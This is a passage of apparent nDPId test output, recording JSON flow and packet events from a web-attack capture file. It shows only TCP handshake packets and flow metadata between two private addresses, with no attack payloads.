+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":3,"flow_last_seen":1499347975372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347975372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l4FAAD4GLlesEAABwKgKModgAFCggleBVQ4M24AQAOXGtwAAAQEICgE8wAAD5pF0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347976658,"flow_last_seen":1499347976658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347976658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8370,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1499347976658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z4xAAD4GXkSsEAABwKgKModuAFDMdKbNAAAAAKACchChhQAAAgQFtAQCCAoBPMFBAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8371,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":2,"flow_last_seen":1499347976658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347976658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh26qPdKAzHSmzqAScSCPCQAAAgQFtAQCCAoD5pK2ATzBQQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":3,"flow_last_seen":1499347976659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347976659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z41AAD4GXkusEAABwKgKModuAFDMdKbOqj3SgYAQAOUuEAAAAQEICgE8wUID5pK2"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347845077,"flow_last_seen":1499347850858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347846345,"flow_last_seen":1499347851858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33310,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347847629,"flow_last_seen":1499347852858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347850209,"flow_last_seen":1499347855859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347851476,"flow_last_seen":1499347856859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33364,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347852742,"flow_last_seen":1499347857860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347977941,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33378,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347979251,"flow_last_seen":1499347979251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347979251,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1499347979251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8naJAAD4GKC6sEAABwKgKMoeIAFCOM15oAAAAAKACchAliQAAAgQFtAQCCAoBPMPKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":2,"flow_last_seen":1499347979251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347979251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh4iSkzqsjjNeaaAScSDAAwAAAgQFtAQCCAoD5pU+ATzDygEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":3,"flow_last_seen":1499347979252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347979252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0naNAAD4GKDWsEAABwKgKMoeIAFCOM15pkpM6rYAQAOVfCwAAAQEICgE8w8oD5pU+"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347980524,"flow_last_seen":1499347980524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347980524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1499347980524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eP5AAD4GTNKsEAABwKgKMoeWAFDY8732AAAAAKACchB57gAAAgQFtAQCCAoBPMUIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":2,"flow_last_seen":1499347980524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347980524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh5YkRgUi2PO996AScSC3AgAAAgQFtAQCCAoD5pZ8ATzFCAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":3,"flow_last_seen":1499347980525,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347980525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eP9AAD4GTNmsEAABwKgKMoeWAFDY8733JEYFI4AQAOVWCgAAAQEICgE8xQgD5pZ8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347981782,"flow_last_seen":1499347981782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347981782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1499347981782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XEpAAD4GaYasEAABwKgKMoekAFBFSZoIAAAAAKACchAwPwAAAgQFtAQCCAoBPMZCAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":2,"flow_last_seen":1499347981782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347981782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh6RlAFMiRUmaCaAScSDdXQAAAgQFtAQCCAoD5pe3ATzGQgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8414,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":3,"flow_last_seen":1499347981783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347981783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XEtAAD4GaY2sEAABwKgKMoekAFBFSZoJZQBTI4AQAOV8ZAAAAQEICgE8xkMD5pe3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347983061,"flow_last_seen":1499347983061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347983061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1499347983061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HjdAAD4Gp5msEAABwKgKMoeyAFDTp9m1AAAAAKACchBg5QAAAgQFtAQCCAoBPMeCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":2,"flow_last_seen":1499347983061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347983061,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh7KKfm1X06fZtqAScSDNEQAAAgQFtAQCCAoD5pj2ATzHggEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":3,"flow_last_seen":1499347983062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347983062,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HjhAAD4Gp6CsEAABwKgKMoeyAFDTp9m2in5tWIAQAOVsGQAAAQEICgE8x4ID5pj2"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347984370,"flow_last_seen":1499347984370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347984370,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34752,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1499347984370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81w5AAD4G7sGsEAABwKgKMofAAFB4CR\/HAAAAAKACchB1HQAAAgQFtAQCCAoBPMjJAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":2,"flow_last_seen":1499347984370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347984370,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh8AzI3sOeAkfyKAScSAppgAAAgQFtAQCCAoD5po+ATzIyQEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":3,"flow_last_seen":1499347984371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347984371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01w9AAD4G7sisEAABwKgKMofAAFB4CR\/IMyN7D4AQAOXIrAAAAQEICgE8yMoD5po+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347985686,"flow_last_seen":1499347985686,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347985686,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8445,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1499347985686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UVJAAD4GdH6sEAABwKgKMofOAFAxwJtBAAAAAKACchA+lAAAAgQFtAQCCAoBPMoTAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":2,"flow_last_seen":1499347985687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347985687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh84CN1TUMcCbQqAScSBI+gAAAgQFtAQCCAoD5puHATzKEwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8447,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":3,"flow_last_seen":1499347985687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347985687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UVNAAD4GdIWsEAABwKgKMofOAFAxwJtCAjdU1YAQAOXoAQAAAQEICgE8yhMD5puH"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347988233,"flow_last_seen":1499347988233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1499347988233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aCNAAD4GXa2sEAABwKgKMofoAFBt56SsAAAAAKACchD2awAAAgQFtAQCCAoBPMyPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":2,"flow_last_seen":1499347988233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh+gH+IEYbeekraAScSDMUAAAAgQFtAQCCAoD5p4DATzMjwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":3,"flow_last_seen":1499347988234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347988234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aCRAAD4GXbSsEAABwKgKMofoAFBt56StB\/iBGYAQAOVrWAAAAQEICgE8zI8D5p4D"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 